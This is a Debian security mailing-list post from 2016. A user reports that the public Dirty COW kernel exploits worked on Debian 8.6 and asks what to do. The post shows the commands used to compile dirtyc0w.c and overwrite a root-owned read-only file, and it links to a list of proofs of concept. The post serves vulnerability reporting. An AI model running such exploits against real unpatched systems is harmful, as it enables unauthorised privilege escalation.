[
Date Prev
][
Date Next
] [
Thread Prev
][
Thread Next
] [
Date Index
] [
Thread Index
]
vulnerability in 8.6
To
:
debian-security@lists.debian.org
Subject
: vulnerability in 8.6
From
: Ozgur <
okaratas@member.fsf.org
>
Date
: Mon, 7 Nov 2016 18:54:55 +0300
Message-id
: <
[🔎]
CANgUfue3sq+2WE0R9eJPHHobCp0fJz2-5XaB0R1UqnbR7wEqQA@mail.gmail.com
>
Hi all,
I have been reading security articles and I seen a test with Debian Linux vulnerability of kernel. I tested and given a successful exploit.
List a vuln:
https://github.com/dirtycow/
dirtycow.github.io/wiki/PoCs
My testing:
dirtycow.c (status: success)
cowroot.c (status: success)
For example, I have installed Debian and kernel version are as follow:
Linux 3.16.0-4-amd64 (Debian 8.6)
I created a "zoo" file with root privileges and locked a file:
# echo I'm a root > foo
# chmod 0404 foo
# ls -la foo
-r-----r-- 1 root root 11 Nov 7 10:13 foo
then I'm return my user (not root) and I downloaded the exploit script and run it:
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo blabla
$ cat foo
blabla
what is the suggestion on this exploit?
Regards,
~Ozgur
Reply to:
debian-security@lists.debian.org
Ozgur (on-list)
Ozgur (off-list)
Follow-Ups
:
Re: vulnerability in 8.6
From:
Salvatore Bonaccorso <carnil@debian.org>
Re: vulnerability in 8.6
From:
Richard van den Berg <richard@vdberg.org>
Prev by Date:
Re: Userdata stays in RAM after Logout and Relogin
Next by Date:
Re: vulnerability in 8.6
Previous by thread:
Re: Userdata stays in RAM after Logout and Relogin
Next by thread:
Re: vulnerability in 8.6
Index(es):
Date
Thread